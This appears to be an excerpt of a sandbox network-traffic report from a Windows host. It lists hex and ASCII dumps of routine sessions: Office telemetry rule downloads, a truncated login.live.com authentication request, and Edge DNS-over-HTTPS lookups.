                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:25 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 477
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 94fafadb-001e-0049-3f27-265bd5000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210225Z-r197bdfb6b4wmcgqdschtyp7yg00000005hg000000006757
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:25 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                30192.168.2.54977620.190.159.0443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:26 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                                Content-Length: 3592
                                                                                                                                                                                                                                                                                                                                Host: login.live.com
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:26 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:26 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Expires: Mon, 28 Oct 2024 21:01:26 GMT
                                                                                                                                                                                                                                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                x-ms-route-info: C555_BAY
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 09bae9f7-afdc-4877-bc48-973a43145359
                                                                                                                                                                                                                                                                                                                                PPServer: PPV: 30 H: PH1PEPF0001B8CA V: 0
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:25 GMT
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Length: 1276
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:26 UTC1276INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                31192.168.2.54979013.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:26 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:26 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 419
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 47f8d5d2-401e-005b-1e67-279c0c000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210226Z-16849878b78sx229w7g7at4nkg00000003s000000000pnsc
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:26 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                32192.168.2.549798162.159.61.34436404C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:26 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:26 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:26 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:26 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                                                                                                CF-RAY: 8d9dddea0d63e946-DFW
                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:26 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 b9 00 04 8e fa 71 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcomq^)


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                33192.168.2.549799162.159.61.34436404C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:26 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:26 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:26 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:26 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                                                                                                CF-RAY: 8d9dddea18f945ef-DFW
                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:26 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 5e 00 04 8e fa 72 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom^r^)


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                34192.168.2.549800162.159.61.34436404C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:26 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:26 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:26 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:26 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                                                                                                CF-RAY: 8d9dddea1ea36bde-DFW
                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:26 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 12 00 04 8e fb 74 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcomt^)


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                35192.168.2.54979713.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:26 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:26 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 428
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 67fffc2c-401e-000a-5dae-264a7b000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210226Z-16849878b78tg5n42kspfr0x4800000005f000000000vm7y
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                36192.168.2.54979213.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:26 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:26 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 472
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 2faa3f77-001e-008d-269c-27d91e000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210226Z-r197bdfb6b46krmwag4tzr9x7c000000057g00000000p89u
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                37192.168.2.54979413.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:26 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
